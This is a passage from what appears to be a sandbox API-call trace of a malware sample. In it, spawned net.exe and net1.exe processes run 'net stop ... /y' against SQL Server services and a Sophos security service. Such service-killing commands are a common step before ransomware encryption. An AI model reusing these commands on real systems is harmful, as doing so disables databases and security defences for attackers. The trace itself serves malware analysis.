lpcchBuffer=0x15f7dc | out: lpServiceName="", lpcchBuffer=0x15f7dc) returned 0 [0198.681] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER") returned -12 [0198.681] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER") returned -14 [0198.682] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER") returned 5 [0198.682] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER") returned 5 [0198.682] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER") returned 5 [0198.682] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER") returned 5 [0198.682] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER") returned 5 [0198.682] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER") returned 10 [0198.682] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER") returned 10 [0198.682] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER") returned 10 [0198.682] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER") returned 3 [0198.682] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER") returned -9 [0198.682] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER") returned -1 [0198.682] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER") returned 6 [0198.682] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER") returned 6 [0198.682] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER") returned 6 [0198.682] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER") returned -1 [0198.682] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER") returned -12 [0198.682] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER") returned 1 [0198.682] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER", opcode=0x0, arg=0x0, bufptr=0x15f7d8 | out: bufptr=0x15f7d8) returned 0x889 [0198.683] wcscpy_s (in: _Destination=0xdca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0198.683] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0198.684] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdcb338, nSize=0x800, Arguments=0xdc9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0198.686] GetFileType (hFile=0x26c) returned 0x3 [0198.686] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x594020 [0198.686] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x594020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nX", lpUsedDefaultChar=0x0) returned 30 [0198.686] WriteFile (in: hFile=0x26c, lpBuffer=0x594020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x15f718, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f718, lpOverlapped=0x0) returned 0 [0198.686] LocalFree (hMem=0x594020) returned 0x0 [0198.686] GetFileType (hFile=0x26c) returned 0x3 [0198.686] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5962c8 [0198.686] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5962c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nY", lpUsedDefaultChar=0x0) returned 2 [0198.686] WriteFile (in: hFile=0x26c, lpBuffer=0x5962c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f718, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f718, lpOverlapped=0x0) returned 0 [0198.686] LocalFree (hMem=0x5962c8) returned 0x0 [0198.686] _ultow (in: _Dest=0x889, _Radix=1439560 | out: _Dest=0x889) returned="2185" [0198.686] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdcb338, nSize=0x800, Arguments=0xdc9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0198.686] GetFileType (hFile=0x26c) returned 0x3 [0198.686] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5962c8 [0198.686] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5962c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0198.686] WriteFile (in: hFile=0x26c, lpBuffer=0x5962c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x15f724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f724, lpOverlapped=0x0) returned 0 [0198.686] LocalFree (hMem=0x5962c8) returned 0x0 [0198.686] GetFileType (hFile=0x26c) returned 0x3 [0198.686] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5962c8 [0198.686] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5962c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nY", lpUsedDefaultChar=0x0) returned 2 [0198.686] WriteFile (in: hFile=0x26c, lpBuffer=0x5962c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x15f724, lpOverlapped=0x0) returned 0 [0198.686] LocalFree (hMem=0x5962c8) returned 0x0 [0198.687] NetApiBufferFree (Buffer=0x591c80) returned 0x0 [0198.687] NetApiBufferFree (Buffer=0x591c98) returned 0x0 [0198.687] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y" [0198.687] exit (_Code=2) Process: id = "150" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a93b000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLTELEMETRY /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 323 os_tid = 0x5e8 Process: id = "151" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51c85000" os_pid = "0x6e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "150" os_parent_pid = "0xad4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLTELEMETRY /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 324 os_tid = 0x418 [0198.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f7ec | out: lpSystemTimeAsFileTime=0x18f7ec*(dwLowDateTime=0x3fb3fe80, dwHighDateTime=0x1d57a87)) [0198.830] GetCurrentProcessId () returned 0x6e0 [0198.830] GetCurrentThreadId () returned 0x418 [0198.830] GetTickCount () returned 0x116b5c8 [0198.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18f7e4 | out: lpPerformanceCount=0x18f7e4*=31911471533) returned 1 [0198.830] GetModuleHandleA (lpModuleName=0x0) returned 0xdd0000 [0198.830] __set_app_type (_Type=0x1) [0198.830] __p__fmode () returned 0x74eb31f4 [0198.830] __p__commode () returned 0x74eb31fc [0198.831] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xddffe6) returned 0x0 [0198.831] __getmainargs (in: _Argc=0xde9064, _Argv=0xde906c, _Env=0xde9068, _DoWildCard=0, _StartInfo=0xde9024 | out: _Argc=0xde9064, _Argv=0xde906c, _Env=0xde9068) returned 0 [0198.831] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.831] GetConsoleOutputCP () returned 0x1b5 [0198.831] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xde9080 | out: lpCPInfo=0xde9080) returned 1 [0198.831] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.834] sprintf_s (in: _DstBuf=0x18f7a4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0198.834] setlocale (category=0, locale=".437") returned="English_United States.437" [0198.836] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0198.836] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0198.836] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY /y" [0198.836] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f570, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0198.836] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6c) returned 0x403c10 [0198.837] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0198.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18f774 | out: Buffer=0x18f774*=0x401c70) returned 0x0 [0198.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18f774 | out: Buffer=0x18f774*=0x401c88) returned 0x0 [0198.837] _fileno (_File=0x74eb2900) returned -2 [0198.837] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0198.837] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0198.837] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0198.837] _wcsicmp (_String1="config", _String2="stop") returned -16 [0198.837] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0198.837] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0198.837] _wcsicmp (_String1="file", _String2="stop") returned -13 [0198.837] _wcsicmp (_String1="files", _String2="stop") returned -13 [0198.837] _wcsicmp (_String1="group", _String2="stop") returned -12 [0198.837] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0198.837] _wcsicmp (_String1="help", _String2="stop") returned -11 [0198.837] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0198.837] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0198.837] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0198.837] _wcsicmp (_String1="session", _String2="stop") returned -15 [0198.837] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0198.837] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0198.837] _wcsicmp (_String1="share", _String2="stop") returned -12 [0198.837] _wcsicmp (_String1="start", _String2="stop") returned -14 [0198.837] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0198.837] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0198.837] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0198.837] _wcsicmp (_String1="accounts", _String2="SQLTELEMETRY") returned -18 [0198.838] _wcsicmp (_String1="computer", _String2="SQLTELEMETRY") returned -16 [0198.838] _wcsicmp (_String1="config", _String2="SQLTELEMETRY") returned -16 [0198.838] _wcsicmp (_String1="continue", _String2="SQLTELEMETRY") returned -16 [0198.838] _wcsicmp (_String1="cont", _String2="SQLTELEMETRY") returned -16 [0198.838] _wcsicmp (_String1="file", _String2="SQLTELEMETRY") returned -13 [0198.838] _wcsicmp (_String1="files", _String2="SQLTELEMETRY") returned -13 [0198.838] _wcsicmp (_String1="group", _String2="SQLTELEMETRY") returned -12 [0198.838] _wcsicmp (_String1="groups", _String2="SQLTELEMETRY") returned -12 [0198.838] _wcsicmp (_String1="help", _String2="SQLTELEMETRY") returned -11 [0198.838] _wcsicmp (_String1="helpmsg", _String2="SQLTELEMETRY") returned -11 [0198.838] _wcsicmp (_String1="localgroup", _String2="SQLTELEMETRY") returned -7 [0198.838] _wcsicmp (_String1="pause", _String2="SQLTELEMETRY") returned -3 [0198.838] _wcsicmp (_String1="session", _String2="SQLTELEMETRY") returned -12 [0198.838] _wcsicmp (_String1="sessions", _String2="SQLTELEMETRY") returned -12 [0198.838] _wcsicmp (_String1="sess", _String2="SQLTELEMETRY") returned -12 [0198.838] _wcsicmp (_String1="share", _String2="SQLTELEMETRY") returned -9 [0198.838] _wcsicmp (_String1="start", _String2="SQLTELEMETRY") returned 3 [0198.838] _wcsicmp (_String1="stats", _String2="SQLTELEMETRY") returned 3 [0198.838] _wcsicmp (_String1="statistics", _String2="SQLTELEMETRY") returned 3 [0198.838] _wcsicmp (_String1="stop", _String2="SQLTELEMETRY") returned 3 [0198.838] _wcsicmp (_String1="time", _String2="SQLTELEMETRY") returned 1 [0198.838] _wcsicmp (_String1="user", _String2="SQLTELEMETRY") returned 2 [0198.838] _wcsicmp (_String1="users", _String2="SQLTELEMETRY") returned 2 [0198.838] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY") returned -6 [0198.838] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY") returned -6 [0198.838] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY") returned -1 [0198.838] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY") returned -1 [0198.838] _wcsicmp (_String1="netpopup", _String2="SQLTELEMETRY") returned -5 [0198.838] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY") returned -1 [0198.838] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY") returned -1 [0198.838] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY") returned -1 [0198.838] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY") returned 4 [0198.838] _wcsicmp (_String1="work", _String2="SQLTELEMETRY") returned 4 [0198.838] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY") returned 4 [0198.838] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY") returned -3 [0198.838] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY") returned -15 [0198.838] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY") returned -7 [0198.838] _wcsicmp (_String1="server", _String2="SQLTELEMETRY") returned -12 [0198.839] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY") returned 5 [0198.839] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY") returned 1 [0198.839] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY") returned -7 [0198.839] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY") returned -18 [0198.839] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY") returned -5 [0198.839] _wcsupr (in: _String="SQLTELEMETRY" | out: _String="SQLTELEMETRY") returned="SQLTELEMETRY" [0198.839] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4054d0 [0198.841] GetServiceKeyNameW (in: hSCManager=0x4054d0, lpDisplayName="SQLTELEMETRY", lpServiceName=0xdeaaf0, lpcchBuffer=0x18f710 | out: lpServiceName="", lpcchBuffer=0x18f710) returned 0 [0198.842] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY") returned -6 [0198.842] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY") returned -6 [0198.842] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY") returned -1 [0198.842] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY") returned -1 [0198.842] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY") returned -1 [0198.842] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY") returned -1 [0198.842] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY") returned -1 [0198.842] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY") returned 4 [0198.842] _wcsicmp (_String1="work", _String2="SQLTELEMETRY") returned 4 [0198.842] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY") returned 4 [0198.842] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY") returned -3 [0198.842] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY") returned -15 [0198.842] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY") returned -7 [0198.842] _wcsicmp (_String1="server", _String2="SQLTELEMETRY") returned -12 [0198.842] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY") returned 5 [0198.842] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY") returned 1 [0198.842] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY") returned -7 [0198.842] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY") returned -18 [0198.842] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY") returned -5 [0198.842] NetServiceControl (in: servername=0x0, service="SQLTELEMETRY", opcode=0x0, arg=0x0, bufptr=0x18f70c | out: bufptr=0x18f70c) returned 0x889 [0198.843] wcscpy_s (in: _Destination=0xdea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0198.843] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0198.844] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdeb338, nSize=0x800, Arguments=0xde9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0198.845] GetFileType (hFile=0x26c) returned 0x3 [0198.845] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x404000 [0198.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x404000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0198.845] WriteFile (in: hFile=0x26c, lpBuffer=0x404000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x18f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f64c, lpOverlapped=0x0) returned 0 [0198.845] LocalFree (hMem=0x404000) returned 0x0 [0198.845] GetFileType (hFile=0x26c) returned 0x3 [0198.845] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4062a8 [0198.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4062a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0198.845] WriteFile (in: hFile=0x26c, lpBuffer=0x4062a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f64c, lpOverlapped=0x0) returned 0 [0198.845] LocalFree (hMem=0x4062a8) returned 0x0 [0198.845] _ultow (in: _Dest=0x889, _Radix=1635964 | out: _Dest=0x889) returned="2185" [0198.845] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdeb338, nSize=0x800, Arguments=0xde9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0198.846] GetFileType (hFile=0x26c) returned 0x3 [0198.846] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4062a8 [0198.846] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4062a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0198.846] WriteFile (in: hFile=0x26c, lpBuffer=0x4062a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18f658, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f658, lpOverlapped=0x0) returned 0 [0198.846] LocalFree (hMem=0x4062a8) returned 0x0 [0198.846] GetFileType (hFile=0x26c) returned 0x3 [0198.846] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4062a8 [0198.846] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4062a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0198.846] WriteFile (in: hFile=0x26c, lpBuffer=0x4062a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f658, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f658, lpOverlapped=0x0) returned 0 [0198.846] LocalFree (hMem=0x4062a8) returned 0x0 [0198.846] NetApiBufferFree (Buffer=0x401c70) returned 0x0 [0198.847] NetApiBufferFree (Buffer=0x401c88) returned 0x0 [0198.847] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY /y" [0198.847] exit (_Code=2) Process: id = "152" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60240000" os_pid = "0x710" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 325 os_tid = 0x3a0 Process: id = "153" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fe42000" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "152" os_parent_pid = "0x710" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 326 os_tid = 0x6c8 [0199.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f99c | out: lpSystemTimeAsFileTime=0x32f99c*(dwLowDateTime=0x3fe138a0, dwHighDateTime=0x1d57a87)) [0199.134] GetCurrentProcessId () returned 0x308 [0199.134] GetCurrentThreadId () returned 0x6c8 [0199.134] GetTickCount () returned 0x116b6f1 [0199.134] QueryPerformanceCounter (in: lpPerformanceCount=0x32f994 | out: lpPerformanceCount=0x32f994*=31941856416) returned 1 [0199.134] GetModuleHandleA (lpModuleName=0x0) returned 0x4c0000 [0199.134] __set_app_type (_Type=0x1) [0199.134] __p__fmode () returned 0x74eb31f4 [0199.134] __p__commode () returned 0x74eb31fc [0199.134] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4cffe6) returned 0x0 [0199.135] __getmainargs (in: _Argc=0x4d9064, _Argv=0x4d906c, _Env=0x4d9068, _DoWildCard=0, _StartInfo=0x4d9024 | out: _Argc=0x4d9064, _Argv=0x4d906c, _Env=0x4d9068) returned 0 [0199.135] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.135] GetConsoleOutputCP () returned 0x1b5 [0199.135] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4d9080 | out: lpCPInfo=0x4d9080) returned 1 [0199.135] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.138] sprintf_s (in: _DstBuf=0x32f954, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0199.138] setlocale (category=0, locale=".437") returned="English_United States.437" [0199.140] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0199.140] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0199.140] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y" [0199.140] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32f720, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0199.140] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x90) returned 0x8a4c00 [0199.140] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0199.141] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f924 | out: Buffer=0x32f924*=0x8a1c98) returned 0x0 [0199.141] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f924 | out: Buffer=0x32f924*=0x8a1cb0) returned 0x0 [0199.141] _fileno (_File=0x74eb2900) returned -2 [0199.141] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0199.141] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0199.141] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0199.141] _wcsicmp (_String1="config", _String2="stop") returned -16 [0199.141] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0199.141] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0199.141] _wcsicmp (_String1="file", _String2="stop") returned -13 [0199.141] _wcsicmp (_String1="files", _String2="stop") returned -13 [0199.141] _wcsicmp (_String1="group", _String2="stop") returned -12 [0199.141] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0199.141] _wcsicmp (_String1="help", _String2="stop") returned -11 [0199.141] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0199.141] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0199.141] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0199.141] _wcsicmp (_String1="session", _String2="stop") returned -15 [0199.141] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0199.141] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0199.141] _wcsicmp (_String1="share", _String2="stop") returned -12 [0199.141] _wcsicmp (_String1="start", _String2="stop") returned -14 [0199.141] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0199.141] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0199.141] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0199.141] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0199.141] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0199.141] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0199.142] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0199.142] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0199.142] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0199.142] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0199.142] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0199.142] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0199.142] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0199.142] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0199.142] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0199.142] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0199.142] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="sessions", 